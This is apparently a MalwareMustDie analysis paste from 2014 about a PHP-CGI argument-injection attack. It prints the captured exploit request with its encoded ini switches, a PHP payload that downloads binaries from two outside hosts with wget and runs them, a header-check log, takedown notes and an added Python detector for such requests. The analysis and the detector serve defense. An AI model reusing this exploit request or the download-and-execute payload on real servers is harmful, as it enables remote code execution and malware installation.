I'm a mu mu mu? Just a Crap!

MalwareMustDie Jul 27th, 2014 434 Never
// #MalwareMustDie sCRAPnote
// I'm a mu mu mu ? Is a lamer crap!

POST /cgi-bin/phpinfo.php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: I`m a mu mu mu ?
Content-Type: application/x-www-form-urlencoded
Content-Length: 502
Connection: close
<?php
$tmp = sys_get_temp_dir();
$path = getcwd();
$file = "e.html";
$url = "http://eleven11root.servepics.com";
system("wget $url -P - -O" . $tmp . "/e.html");
system("chmod -R 777" . $tmp ."/e.html");
chmod ($tmp."/".$file,0777);
system($tmp . "/e.html");
$file2 = "t.htm";
$url2 = "http://twelfe12root.servepics.com";
system("wget $url2 -P - -O" . $tmp . "/t.htm");
system("chmod -R 777" . $tmp ."/t.htm");
chmod ($tmp."/".$file2,0777);
system($tmp . "/t.htm");
echo $tmp;
echo $path;
die($tmp);

/ infected site dropped binaries /
wget http://eleven11root.servepics.com -P - -O ./e.html
wget http://twelfe12root.servepics.com -P - -O ./t.html

/ header checks /
--2014-07-25 12:48:57--  http://twelfe12root.servepics.com/
Resolving twelfe12root.servepics.com... 8.23.224.90
Caching twelfe12root.servepics.com => 8.23.224.90
Connecting to twelfe12root.servepics.com|8.23.224.90|:80... connected.
Created socket 4.
Releasing 0x00007fc878404890 (new refcount 1).
GET / HTTP/1.1
User-Agent: MMDBangsMyget/1.14 (MalwareMustDie12.2.1)
Accept: **
Host: twelfe12root.servepics.com
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 302 Found
Date: Fri, 25 Jul 2014 03:48:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Location: http://127.0.0.1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
302 Found
Location: http://127.0.0.1 [following]
Closed fd 4
Connecting to 127.0.0.1:80... Closed fd 4
failed: Connection refused.
Releasing 0x00007fc878403ed0 (new refcount 0).
Deleting unused 0x00007fc878403ed0.

/ Encryption analysis /
%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E

/ crack result /
https://twitter.com/MalwareMustDie/status/492534140340682754

/ status /
CNC was knocked down, @MMD Tango Team
different case, same incident: http://pastebin.com/VePW1zGP

#MalwareMustDie | cracked & reported by @unixfreaxjp
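
Added example, not part of the original paste: a Python check that a defender can run over web-server request lines to decode a query string like the one under "Encryption analysis" and list the php-cgi `-d` ini overrides it carries. The sample lines, the function name `analyze_request_line` and the `HIGH_RISK` set are assumptions made for this illustration.

```python
import re
from urllib.parse import unquote_plus

# Request line in the shape captured above. Constructed sample: the query string is
# shortened to three of the switches seen in the paste.
SAMPLE_ATTACK = ("POST /cgi-bin/phpinfo.php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F"
                 "%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%61%75%74%6F%5F%70%72%65%70"
                 "%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1")
SAMPLE_BENIGN = "GET /cgi-bin/phpinfo.php?page=2&sort=-date HTTP/1.1"  # constructed

# ini overrides that make the POST body run as code or lift PHP restrictions
# (hypothetical triage list, taken from the directives in the paste)
HIGH_RISK = {"auto_prepend_file", "auto_append_file", "allow_url_include",
             "disable_functions", "open_basedir", "safe_mode", "cgi.force_redirect"}

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$")


def analyze_request_line(line):
    """Return a finding dict if the query string decodes to php-cgi switches, else None."""
    m = REQUEST_LINE.match(line.strip())
    if not m or "?" not in m.group("target"):
        return None
    raw_query = m.group("target").split("?", 1)[1]
    # A CGI query string is only passed on as command-line arguments when it
    # contains no literal '='; in the captured request every '=' is hidden as %3D.
    if "=" in raw_query:
        return None
    args = unquote_plus(raw_query).split()
    if not args or not args[0].startswith("-"):
        return None
    overrides, i = {}, 0
    while i < len(args):
        if args[i] == "-d" and i + 1 < len(args):
            key, _, value = args[i + 1].partition("=")
            overrides[key] = value.strip('"')
            i += 2
        else:
            i += 1
    return {"method": m.group("method"),
            "switches": [a for a in args if a.startswith("-")],
            "ini_overrides": overrides,
            "high_risk": sorted(HIGH_RISK & overrides.keys())}


if __name__ == "__main__":
    for sample in (SAMPLE_ATTACK, SAMPLE_BENIGN):
        print(analyze_request_line(sample))
```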